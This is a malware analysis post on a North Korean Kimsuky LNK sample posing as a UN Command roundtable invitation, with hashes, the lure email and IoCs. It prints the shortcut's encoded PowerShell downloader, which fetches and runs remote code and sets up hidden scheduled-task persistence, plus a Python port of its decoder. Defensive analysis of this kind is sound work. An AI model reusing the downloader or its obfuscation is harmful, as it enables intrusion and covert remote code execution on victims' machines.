lazarusholic


North Korean Kimsuky malware themed on the ROK-US military alliance - Update Schedule_INVITATION - 250625 UNC Ambassador_s Roundtable.zip (2025.6.11)

2025-08-29, Sakai
https://wezard4u.tistory.com/429583
#Kimsuky #LNK

Contents

Today's post covers Update Schedule_INVITATION - 250625 UNC Ambassador_s Roundtable.zip, a malware sample attributed to the North Korean Kimsuky group.
The lure name, "Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable", suggests the attack was carried out by posing as the United Nations Command (UNC).
The malicious archive is password-protected; after entering the password and opening it, you find a single file disguised as a PDF.
Filename: Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable.zip
Size: 1 MB
MD5: 488570af25f908e907c9732aae632b0f
SHA-1: 5648d0e3c8baa6ae955fa5441ab8fdbbfcb39f88
SHA-256: 9c5964753f8092a98f414a97cfb02cbe2692a02bea0d1b601ff205282fbf8a62
On June 10, 2025, an email believed to have been sent under the name Chang Hyo Chong Eric (장효정 에릭) was delivered to the foreign ministry of a Southern European country. The sender address was landf5503@gmail(.)com.
The hashes of the file extracted from the archive are as follows. Note the extension: the file is an LNK shortcut given a double extension (.pdf.lnk), and at roughly 1 MB it is far larger than any legitimate shortcut, which is itself a useful detection signal.
Filename: Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable.pdf.lnk
Size: 1 MB
MD5: bca4cac80c436e813d93eba1b25257d0
SHA-1: 96ad2f7ad615d80fc37678ba3e4193caf7cc807b
SHA-256: 9f5460850a3b5b53568cd450e83406927776833778a8eb24955bcebdf9849321
Code contained in the malware (LNK StringData). The embedded name string advertises a 2.84 KB Hangul document dated 2023, which matches neither the .pdf name nor the 1 MB size of the actual file; the command-line arguments carry a base64 blob plus a hand-rolled decoder that writes the decoded PowerShell to main.ps1 in the temp directory and runs it. The blob is line-wrapped here and, as transcribed, contains parenthesised characters that are not part of the base64 alphabet; resolve those against the real sample before decoding.
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments: $bas2 = \"JGhoaD1Kb2luLVBhdGggKFtTeXN0Z(d)ldFRlbXBQYXRoKCkpICJVcGRh
dGUgU2NoZWR1bGVfSU5WSVRBVElPTiAtIDI1MDYyNSBVTkMgQW1iYXNzYWRvcidzIFJvdW5kdGFibGUucGRmIjsk
dGtmPSJnaCIrInBfOSIrImYiKyJ4eFNKIi(si)TSIrIk0iKyJ2SSIrImhkVyIrIklLdiIrInR6WSIrInh3NiIrIkx
YIisiakVpIisiRk5qIisiNFVVIisidHYiKyJYIjskYnN0cj0iaCIrInQiKyJ0IisicCIrInMiKyI6IisiLyIrIi8iKyJyI(i)siYSIrIncuZ2l0aCIrInVidXNlIisicmNvbiIrInRlIisibnQuIisiY29tIisiL2wiKyJhbmRqIisiaG9u
LyIrInRva3VsIisiYSIrIi9tYWkiKyJuIisiLyI7JHJzdHI9JGJzdHIrInRtcC5wZ(G)YiOyRocnMgPSBAe0F1dGhvcm
l6YXRpb249InRva2VuICR0a2YiO3NyamlkYz0iZHNnaGprZ2VramhnZWdlZ2VnciI7QWNjZXB0PSJhcHBsaWNhdGlv
bi92bmQuZ2l0aHViLnYzLnJhdyJ9O0lud(m)9rZS1XZWJSZXF1ZXN0IC1VcmkgJHJzdHIgLUhlYWRlcnMgJGhycyAtT3
V0RmlsZSAkaGhoOyYgJGhoaDskcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ci
A9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7ICRic3A9IicrJGJzdHIrJ29meC50eH
QiOyRoc3A9QHtBdXRob3JpemF0aW9uPSJ0b2tlbiAnKyR0a2YrJyI(Y)z0iaGRqZ0VSRXJpdDc4M3RpdSI7QWNjZXB0P
SJhcHBsaWNhdGlvbi92bmQuZ2l0aHViLnYzLnJhdyJ9O0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJGJzcCAtSGVhZGVyc
yAkaHNwIC1PdXRGaWxl(I)CRhYWE7JiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHw
gT3V0LUZpbGUgLUZpbGVQYXRoICRwcHAgLUVuY29kaW5nIFVURjg7ICRhY3Rpb24gPSBOZXctU2No(Z)WR1bGVkVGFza
0FjdGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnIC1Bcmd1bWVudCAnLVdpbmRvd1N0eWxlIEhpZGRlbiAtbm9wI
CAtTm9uSW50ZXJhY3RpdmUgLU5vUHJvZmlsZSAtRXhl(Y)3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiJiB7JGF
iYyA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSBcImNocm9tZS5wczFcI(j)sgJiAkYWJjO30iJzsgJHRyaWdnZXIgP
SBOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpd
GlvbkludGVydmFsIChOZXctV(G)ltZVNwYW4gLU1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGF
za1NldHRpbmdzU2V0IC1IaWRkZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJNaWNyb(3)JmdGVyd
GVndWVzb2Z0bGVVcGRhdGVtYXJsZXJw(R)ic3RyKyJvbmYudHh0IjtJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRyc3RyI
C1IZWFkZXJzICRocnMgLU91dEZpbGUgJGFhYTsmI(C)RhYWE7IF(J0lbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlO
w==\";$bsts=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";$bas2=$bas2
(.)TrimEnd('=');$btks=New-Object System(.)Collections(.)Generic.List[Byte];for($i=0;$i -lt $
bas2.Length;$i+=4){$yhsd=$bas2.Su(b)string($i,[Math]::Min(4,$bas2.Length-$i));$vds=0;$yhs(d)
Len = $yhsd.Length;foreach($c in $yhsd.ToCharArray()){$vds=($vds -shl (6)) -bor $b(s)ts.Inde
xOf($c);};for ($j=16; $j -ge 0;$j -= 8){if((($i*6)/8)+(3-$j/8) -lt (($bas2.Length*6)/8)){$bt
ks.Add([byte](($vds -s(h)r $j) -band 0xFF));}}};$dcdsg1=[System.Text.Encoding]::UTF8.GetStri
ng($(b)tks.ToArray());$ct(y)67sx1=[System.IO.Path]::GetTempPath();$esiu231=\"main.ps1\";$dsv
u1=Join-Path $cty67sx1 $esiu231;$dcdsg1|Ou(t-)File …
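The decoding loop in the command line above is a hand-rolled base64 decoder: it strips '=' padding, folds each 4-character group into a 24-bit value using the $bsts alphabet, and emits a byte only while a fractional running byte count stays below the total. The Python port below is an added example for analysts and is not code from the post or from the sample. It reproduces the loop as transcribed, so the blob can be decoded offline without executing anything, and compares the result with a standard decoder. That comparison is the point: the bounds check uses offsets 1..3 instead of 0..2, so on input whose trimmed length is a multiple of four the last byte is dropped, and a shorter trailing group is misread; the bytes that end up in main.ps1 are therefore not exactly what standard base64 would produce. The readable runs of the blob decode to a stage that assembles a raw.githubusercontent.com URL and a GitHub token from concatenated string fragments, fetches files with Invoke-WebRequest and an Authorization header, writes chrome.ps1 under %AppData% and registers a hidden scheduled task to run it. SAMPLE and SAMPLE_BLOB are constructed input, not the real payload; the parenthesised insertions in the page's transcription must be resolved against the real LNK before its blob is passed in.

```python
"""Port of the hand-rolled base64 loop in the LNK's PowerShell stage.

Added analyst example; not code from the blog post or from the sample.
It decodes a blob lifted from an LNK dump offline and shows exactly how
the attacker's decoder differs from standard base64.
"""
import base64

# Alphabet assigned to $bsts in the LNK command line (standard base64 table).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def lnk_decode(blob: str) -> bytes:
    """Reproduce the PowerShell loop exactly as it appears in the LNK.

    PowerShell details that matter for fidelity:
      * '=' padding is stripped first (TrimEnd('=')).
      * '/' on integers yields a double when inexact, so the bounds check
        compares fractional byte counts.
      * String.IndexOf returns -1 for characters outside the alphabet,
        which str.find mirrors.
    """
    s = blob.rstrip("=")
    n = len(s)
    total_bytes = (n * 6) / 8            # (($bas2.Length*6)/8)
    out = bytearray()
    for i in range(0, n, 4):             # for($i=0;$i -lt $bas2.Length;$i+=4)
        chunk = s[i:i + 4]               # Substring($i,[Math]::Min(4,Length-$i))
        vds = 0
        for c in chunk:                  # $vds=($vds -shl 6) -bor $bsts.IndexOf($c)
            vds = (vds << 6) | ALPHABET.find(c)
        for j in (16, 8, 0):             # for($j=16;$j -ge 0;$j -= 8)
            # Offsets are 1,2,3 here (3-$j/8), not 0,1,2: this is what
            # drops the final byte of a full group at the end of the blob.
            if (i * 6) / 8 + (3 - j / 8) < total_bytes:
                out.append((vds >> j) & 0xFF)
    return bytes(out)


def std_decode(blob: str) -> bytes:
    """Standard base64 after the same TrimEnd('='), re-padded properly."""
    s = blob.rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def strip_wrapping(dump: str) -> str:
    """Remove the line breaks and spaces introduced by wrapping the blob.

    Parenthesised characters in a transcription are left in place on
    purpose: they are not in the alphabet and must be resolved against
    the real LNK, not guessed.
    """
    return "".join(dump.split())


def compare(blob: str) -> dict:
    """Decode both ways and report where the attacker's bytes diverge."""
    a, b = lnk_decode(blob), std_decode(blob)
    common = 0
    while common < min(len(a), len(b)) and a[common] == b[common]:
        common += 1
    return {
        "lnk": a,
        "standard": b,
        "common_prefix": common,
        "lnk_tail": a[common:],
        "standard_tail": b[common:],
    }


# Constructed sample (not the real payload): one line shaped like the
# decoded stage's PowerShell, 45 bytes so the base64 needs no padding.
SAMPLE = b'Join-Path ($env:AppData) "chrome.ps1"; & $abc'
SAMPLE_BLOB = base64.b64encode(SAMPLE).decode()


if __name__ == "__main__":
    r = compare(SAMPLE_BLOB)
    print("attacker loop :", r["lnk"])
    print("standard      :", r["standard"])
    print("diverge after :", r["common_prefix"], "bytes")
```

For the real sample, recover the commandlinearguments value with an LNK parser, pass it through strip_wrapping, then inspect compare(blob)["lnk"]: that byte string, decoded as UTF-8, is the text the stage writes to main.ps1, trailing defects included, which is what you should hunt for on disk rather than the cleaner output of a standard decoder.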

IoC

landf5503@gmail(.)com
5648d0e3c8baa6ae955fa5441ab8fdbbfcb39f88
9f5460850a3b5b53568cd450e83406927776833778a8eb24955bcebdf9849321
488570af25f908e907c9732aae632b0f
9c5964753f8092a98f414a97cfb02cbe2692a02bea0d1b601ff205282fbf8a62
bca4cac80c436e813d93eba1b25257d0
96ad2f7ad615d80fc37678ba3e4193caf7cc807b